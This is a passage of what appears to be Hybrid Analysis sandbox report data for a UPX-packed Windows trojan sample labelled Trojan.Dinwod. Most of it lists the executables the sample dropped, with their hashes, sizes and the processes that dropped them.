Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2
https://hybrid-analysis.com/sample/f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2
Hybrid Analysis - Infostealers
{"size": 354079, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2", "sha256": "f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 97, "extracted_files": [{"name": "02486.exe", "file_path": "C:\\02486.exe", "file_size": 354906, "sha256": "3f2e6c434383e39ddb2d7b16df8a2f2a26dfb6475066b257581f50fa944876d7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66842.exe (PID: 2792)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06204.exe", "file_path": "C:\\06204.exe", "file_size": 354477, "sha256": "e738252df6edf3fe361a3bd5051fc3fbf577378effeb929e563185aa702b93c4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pxxhpb.exe (PID: 864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0806084.exe", "file_path": "C:\\0806084.exe", "file_size": 354859, "sha256": "fc07820fc6aa185536ad2aa8527b383134ba9ea336eb2e25a42fd49ef9144d84", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "84800.exe (PID: 3324)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "206666.exe", "file_path": "C:\\206666.exe", "file_size": 354573, "sha256": "ac7b1b4d3175b261deace9dcacc4d65fb5905a08717dd543baf8836aef703abc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nhppdj.exe (PID: 3456)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "240402.exe", "file_path": "C:\\240402.exe", "file_size": 355093, "sha256": "621df50113e66937e96e937babdbd47d1d4f4edf6962a980974928e0b5d6c35b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2406002.exe (PID: 4812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2406002.exe", "file_path": "C:\\2406002.exe", "file_size": 355080, "sha256": "5b7a6652e820a252608732b28ba92a66754e37882581f2beeb3e7d7cfb4dd231", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2406002.exe (PID: 4812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2484466.exe", "file_path": "C:\\2484466.exe", "file_size": 354873, "sha256": "15a8af68bc1ca4fb3624cf89ad2860dbe80df8618be06241061906a937ef27f3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2484466.exe (PID: 1632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2644808.exe", "file_path": "C:\\2644808.exe", "file_size": 354240, "sha256": "acfab4879e669f3d50b535de114a8bb0fda6d7496a0983464b3ae5ff9cea4cc9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2644808.exe (PID: 4556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28408.exe", "file_path": "C:\\28408.exe", "file_size": 354611, "sha256": "29535c2bcec781b69f15a3224e2cb497a8b90d695eedafdb88e391356cf1e010", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "28408.exe (PID: 4604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "40664.exe", "file_path": "C:\\40664.exe", "file_size": 354634, "sha256": "129493ad3d987e377ef091b2052382a8595c0ba8b2edc97d32379c8becd969ba", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "40664.exe (PID: 796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42020.exe", "file_path": "C:\\42020.exe", "file_size": 354414, "sha256": "44968a0d481457bc27ebdf92e8505bbf477fc84846fb72edb3799559153ddbe7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4868486.exe (PID: 3920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4444446.exe", "file_path": "C:\\4444446.exe", "file_size": 354621, "sha256": "df5747af0aa89ff01e3edbc3cd23e36cb4476fa298077bce5e4d4da2a3562aaf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "28408.exe (PID: 4604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4448240.exe", "file_path": "C:\\4448240.exe", "file_size": 354509, "sha256": "f747e6ae044a63847341485dc9fd2ba382a145b6d556f58d61ced75aa8bdc7da", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4828644.exe (PID: 1436)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4828644.exe", "file_path": "C:\\4828644.exe", "file_size": 354491, "sha256": "aa49f4467df48fe8c5df62da3c9b2c3a21a16594b6ac258df9e9a70da5a09ee8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4828644.exe (PID: 1436)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4868486.exe", "file_path": "C:\\4868486.exe", "file_size": 354400, "sha256": "0748b424a1752f5a2a8dd25d47c67d4709f9151184ff292140ce664b8b0eaa8b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nhjtnrr.exe (PID: 3728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "620220.exe", "file_path": "C:\\620220.exe", "file_size": 354591, "sha256": "5a0699b63dd8281cd4dbf762614644c3313931c9f983436672164fff18eab706", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "620220.exe (PID: 4368)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "644880.exe", "file_path": "C:\\644880.exe", "file_size": 354943, "sha256": "daed1c83ec66ddfb08f03889461219c59538f0efc6b206c5f90c8b7f206b1811", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "644880.exe (PID: 776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6680468.exe", "file_path": "C:\\6680468.exe", "file_size": 354527, "sha256": "9192d091082d71a1ad9afc61966eee5a5088216971ab4fe60947cfbf27a9cbe2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6680468.exe (PID: 4004)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66842.exe", "file_path": "C:\\66842.exe", "file_size": 354886, "sha256": "553ba2508de7dfc8c3dc02e756b6db64906d22b1fe727ef9f209c303742c4ac5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2484466.exe (PID: 1632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "80426.exe", "file_path": "C:\\80426.exe", "file_size": 354546, "sha256": "ac3287577616d9e5560434df8f92d643eeb21391c26b4ef09fd6cce99ad70519", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6680468.exe (PID: 4004)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "824246.exe", "file_path": "C:\\824246.exe", "file_size": 354925, "sha256": "b98dd9b29ceaab568589989c268308bf2b23df1a4ca33f29c399722619bfd7b8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "824246.exe (PID: 2704)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "84800.exe", "file_path": "C:\\84800.exe", "file_size": 354847, "sha256": "d3c62cbbb11ec32b0ad1408cdca89489e3428b71dce593e711667ad9c43593bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dfddlr.exe (PID: 4400)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blvvjn.exe", "file_path": "C:\\blvvjn.exe", "file_size": 355001, "sha256": "05ac254f83b7e030dce1584ca2dc06a441eb541ce98f645e028592f02170c313", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvbpf.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bprdtlh.exe", "file_path": "C:\\bprdtlh.exe", "file_size": 354647, "sha256": "627cf3508f37700eabff2c8482b338dd85af7bb15ff54718a62a486286c30192", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bprdtlh.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "brftth.exe", "file_path": "C:\\brftth.exe", "file_size": 354228, "sha256": "0391e2d2c8dfb1ae67857272a19583269725860e3427b926395a53d87115ba40", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hfbrlh.exe (PID: 3468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dfddlr.exe", "file_path": "C:\\dfddlr.exe", "file_size": 354828, "sha256": "2ca7b596f0d70c29c32b8f18e558699396343f11a8931b1dcc4241f6f28138fb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llxxlrt.exe (PID: 4612)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drppx.exe", "file_path": "C:\\drppx.exe", "file_size": 355068, "sha256": "c007acac750b3b9861a2c57028ba40d2de3cc92040ed2a7be62861274dd8dfd0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xtrhlt.exe (PID: 1216)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtrvhhj.exe", "file_path": "C:\\dtrvhhj.exe", "file_size": 354326, "sha256": "1fb1f3fa52139ac7a147a8777903d0f8dc4325f2f96170bfc9f9a0fa6b90258b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtrvhhj.exe (PID: 1876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fplntnd.exe", "file_path": "C:\\fplntnd.exe", "file_size": 354350, "sha256": "556d30ee7f27f84d13ef00e2b438439dbb1e338a7e838afdf0e32b86956deafe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fplntnd.exe (PID: 1284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fvbpf.exe", "file_path": "C:\\fvbpf.exe", "file_size": 354982, "sha256": "8b9ede0d1154ab5df37e6320445d808ed9e06e282a79796ef2f2df74a05885df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvbpf.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fvxvdn.exe", "file_path": "C:\\fvxvdn.exe", "file_size": 354739, "sha256": "bed302111c54a5245de0ef811d0eb7b8de86a787fb964b3ff0d0d7996accb1bb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvxvdn.exe (PID: 3776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hfbrlh.exe", "file_path": "C:\\hfbrlh.exe", "file_size": 354215, "sha256": "e6b80fdbc969f494fc553db4f16d7ee9b7faf441440d0410451a07a5b8f05d6b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hfbrlh.exe (PID: 3468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jdfnf.exe", "file_path": "C:\\jdfnf.exe", "file_size": 354292, "sha256": "94fca0de2ee1df2e5cd16d5b1109804dcb86f5deaebae2ae2fbba0dd93e3dd28", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jdfnf.exe (PID: 3248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jjjvj.exe", "file_path": "C:\\jjjvj.exe", "file_size": 354426, "sha256": "660d9c9a82b550167a9dc3c6874301dcbec215112a52e6d0e71b44b7b410a94b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jjjvj.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jntndr.exe", "file_path": "C:\\jntndr.exe", "file_size": 354696, "sha256": "591e91cc8b4fa6ab72bd47c6303cb5db82d197b4388dd341e99ea887d092efe4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jntndr.exe (PID: 3352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jtpjhr.exe", "file_path": "C:\\jtpjhr.exe", "file_size": 354788, "sha256": "9dcc24e32da152ae124e126bdf7a1e62d025408f674e328e29049d62ac001b56", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vpvxpp.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jvxvd.exe", "file_path": "C:\\jvxvd.exe", "file_size": 354677, "sha256": "f431bc01668d640a0287cbcf4df91403a9a31fb6b88b57b76c51e3d6613b89b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jvxvd.exe (PID: 4148)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "llpbnv.exe", "file_path": "C:\\llpbnv.exe", "file_size": 354312, "sha256": "1160f8b10a2cc337db83049b7222b86453c15d1bdf254c71918d273e19391723", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jdfnf.exe (PID: 3248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "llxjdlf.exe", "file_path": "C:\\llxjdlf.exe", "file_size": 354149, "sha256": "d00e2f1d10f51fde56d87889d9a7e5da0c4bf7e6fe760d036e8392c2e71ef036", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llxjdlf.exe (PID: 3448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "llxxlrt.exe", "file_path": "C:\\llxxlrt.exe", "file_size": 354808, "sha256": "574442e58fbdc6b5d85ac38fe94ffc8f2f54cda60fffd0ba3c77ff4659a04d1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llxxlrt.exe (PID: 4612)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lpdvdhr.exe", "file_path": "C:\\lpdvdhr.exe", "file_size": 354098, "sha256": "44f8e1cfa8c028d992a595d34f7bfdee261a5d6d954b377e12323b133c4e91e9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpdvdhr.exe (PID: 4544)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ltjhnht.exe", "file_path": "C:\\ltjhnht.exe", "file_size": 354759, "sha256": "51eed39bcbaf2669a735bca6ab39933808accbc15849754b0c05905d1096ba41", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvxvdn.exe (PID: 3776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxdlb.exe", "file_path": "C:\\lxdlb.exe", "file_size": 354336, "sha256": "2913d0bc77e15e596c3fa097d93713227404aa05168e32bf15b1e7b431a11c93", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtrvhhj.exe (PID: 1876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nhjtnrr.exe", "file_path": "C:\\nhjtnrr.exe", "file_size": 354385, "sha256": "e499bb56453c4f224069023f5f11c538b811afad0486c9c3cbec8ec540833ec0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nhjtnrr.exe (PID: 3728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nhppdj.exe", "file_path": "C:\\nhppdj.exe", "file_size": 354558, "sha256": "247ba027c7c19dd8eb58deb19e8a78bff7680e7582619c54ed1ddafebe6a97c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nhppdj.exe (PID: 3456)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "npltvpp.exe", "file_path": "C:\\npltvpp.exe", "file_size": 354136, "sha256": "e0261c6bd9fde6dcf68e8424692e53839548022194fa347a59d66ed605405a5d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "npltvpp.exe (PID: 2192)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nrtffvl.exe", "file_path": "C:\\nrtffvl.exe", "file_size": 354116, "sha256": "b3a4e530fba13f316d692afe47540e07adc403f656aa9202eb53e37aac140028", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpdvdhr.exe (PID: 4544)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ntpjj.exe", "file_path": "C:\\ntpjj.exe", "file_size": 354962, "sha256": "d472b99442fcf1e3ccc9a0052ce8c090d1c4d35bcfc1cc1f2650fbde5d0b8790", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "644880.exe (PID: 776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pbpbdlp.exe", "file_path": "C:\\pbpbdlp.exe", "file_size": 354662, "sha256": "9220a5b89882c7bab3d94f7f06e8325cbd3e646bb63831d2bd79c07e95d7003a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bprdtlh.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pfrdl.exe", "file_path": "C:\\pfrdl.exe", "file_size": 355034, "sha256": "df13b53198e44a1085be0c7733c671d3b9d0e79a270f46086b182cc59668fee4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xfvdbnh.exe (PID: 4716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pxxhpb.exe", "file_path": "C:\\pxxhpb.exe", "file_size": 354462, "sha256": "55fc6658611553cc235718242f6eb240d4741b4a070e4a131cc11044730a2dbb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pxxhpb.exe (PID: 864)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxbdpdj.exe", "file_path": "C:\\rxbdpdj.exe", "file_size": 354273, "sha256": "7fa23dc1850b8dc2196ff8603bd0e6bc466f915b8d6e943db32e68611cea1375", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vjvxf.exe (PID: 2708)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rxrfxtr.exe", "file_path": "C:\\rxrfxtr.exe", "file_size": 354168, "sha256": "6deda608112fc216c70be43779321413957342d5264e4be5ceee27d7c08d150b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llxjdlf.exe (PID: 3448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thdhnfb.exe", "file_path": "C:\\thdhnfb.exe", "file_size": 354726, "sha256": "5f677b8ee76bc0d5165ddd377a570b606f9c8502bc740887ba0ffcb87a62ca9c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thdhnfb.exe (PID: 1084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tljxh.exe", "file_path": "C:\\tljxh.exe", "file_size": 354438, "sha256": "7251e85f071988022425227130d65ee827ad8ddb30914e3401fd435696866d01", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jjjvj.exe (PID: 3712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vhppv.exe", "file_path": "C:\\vhppv.exe", "file_size": 354196, "sha256": "02c0dd549090f441e8bd44da92ca538c51e61c17df4eec5def1be88d2d07ca83", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xhbff.exe (PID: 3612)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjvxf.exe", "file_path": "C:\\vjvxf.exe", "file_size": 354260, "sha256": "579bd56d1e2a1286101d7383bc062c8e49603e6591c58fbb0d10d03e796d407c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vjvxf.exe (PID: 2708)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vnvdx.exe", "file_path": "C:\\vnvdx.exe", "file_size": 354448, "sha256": "a47ff705b7dcde25584b95059c09d0d13a780fb2ebb66e344e34344d63b263bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tljxh.exe (PID: 1856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vpvxpp.exe", "file_path": "C:\\vpvxpp.exe", "file_size": 354772, "sha256": "481021819054bc4ac4f9f3845bca03bee27ee6b12414ea9d0bbfb9aeccb71dda", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vpvxpp.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xbrvntf.exe", "file_path": "C:\\xbrvntf.exe", "file_size": 354710, "sha256": "82ee4368131a9e2101a4a5c7a35994b4f2ac077013fb44fe6afc244534023e13", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jntndr.exe (PID: 3352)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xfvdbnh.exe", "file_path": "C:\\xfvdbnh.exe", "file_size": 355019, "sha256": "888341a91c605c843b2c2efa32164a6c7f4c3829215f87a7a027c6d963e5ea64", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xfvdbnh.exe (PID: 4716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xhbff.exe", "file_path": "C:\\xhbff.exe", "file_size": 354184, "sha256": "e5003a6c4c4be0344b503b9f9c426ccdd2a5106f0a8a3719d4b45cf7d61886df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rxrfxtr.exe (PID: 3228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlfdrhv.exe", "file_path": "C:\\xlfdrhv.exe", "file_size": 354370, "sha256": "6e8a39748ea7440fac9cdb4cee6434c5f8b116e4e36efc28c4f3b0794050e6d4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fplntnd.exe (PID: 1284)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xtrhlt.exe", "file_path": "C:\\xtrhlt.exe", "file_size": 355049, "sha256": "b386fed02aa12a0c1e8781292797aa75c7240f8f5d16d07d2247b5e85f9d9db4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xtrhlt.exe (PID: 1216)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4644224.exe", "file_size": 355258, "sha256": "f4b1a570aff451305494a1df6cafb2d7fac29fb253eb1895c89129ff41fc9a6d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62424.exe", "file_size": 355248, "sha256": "d088e30ce856b94b608b5b292190314ea49ef1f20a7511261c102f52f22e5f2b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20082.exe", "file_size": 355231, "sha256": "1aaf343ad2ea6bcd61e0b153bcafc5e5d7777af898d1630e4bdb0b272aeb62ca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xxvjvfv.exe", "file_size": 355213, "sha256": "74abdd1ceb9d0455ddd9e3233538b997a9afd5b86a010b860fc1e278570d6063", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rpfxpvf.exe", "file_size": 355202, "sha256": "59d0d1f61e4b4732f501c61260afaaa2ae186b273564d453b81a754657e17589", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66262.exe", "file_size": 355192, "sha256": "113dfe66f907110895f76022c6195229c36b0d0c55c03f5c94897ebdc8f0f4fa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6820002.exe", "file_size": 355172, "sha256": "eca30a512095331d58dd90f71a03ccbe1674541faf7e3e2d6c8130c293e2d721", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "020066.exe", "file_size": 355162, "sha256": "f5dd2b0ca1e5b611ab4be10f4d6c8c76bd71589ae5b8165067c4c8c5271f1096", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fjjxl.exe", 